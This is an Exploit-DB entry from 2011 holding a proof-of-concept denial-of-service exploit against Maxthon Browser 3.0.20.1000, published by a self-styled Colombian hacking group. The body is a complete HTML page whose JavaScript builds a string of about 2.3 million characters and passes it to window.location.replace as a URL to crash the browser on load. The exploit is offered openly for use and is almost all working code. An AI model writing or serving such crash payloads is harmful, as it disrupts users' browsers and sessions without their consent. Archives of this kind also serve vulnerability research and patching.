Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service

EDB-ID:

16084

CVE:

N/A




Platform:

Windows

Date:

2011-01-30


<html>
<head>
 
 
# Exploit Title: Maxthon Browser v3.0.20.1000 .ref .replace DOS
# Date: January 30 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://dl.maxthon.com/mx3/mx3.0.20.3000.exe
# Version: v3.0.20.1000 
# Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8
  
  
#  mail----> shogilord^gmail.com spams are welcome!!!!!
#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/ 
  
# COLOMBIA hacking presents.............
#    
# MAxthon Check the .replace and .ref ;)
#

 
<script type="text/javascript">
 
function mul(str,count){
    if(count==0) return '';
    var binaryCount = count.toString(2);
    var numDegree = binaryCount.length;
    var resultStr='';
    for(var i=0; i<numDegree; i++){
        resultStr+=resultStr; 
        if(binaryCount.charAt(i) == '1'){
            resultStr+=str;
        }
    }
    return resultStr;
}
 
var junka = "a";
 
var junk = mul(junka,2304453);
 
//window.location.href = "http://" + junk;
 
window.location.replace("http://" + junk);
 
</script>
</head>
<body>
 
</body>
</html>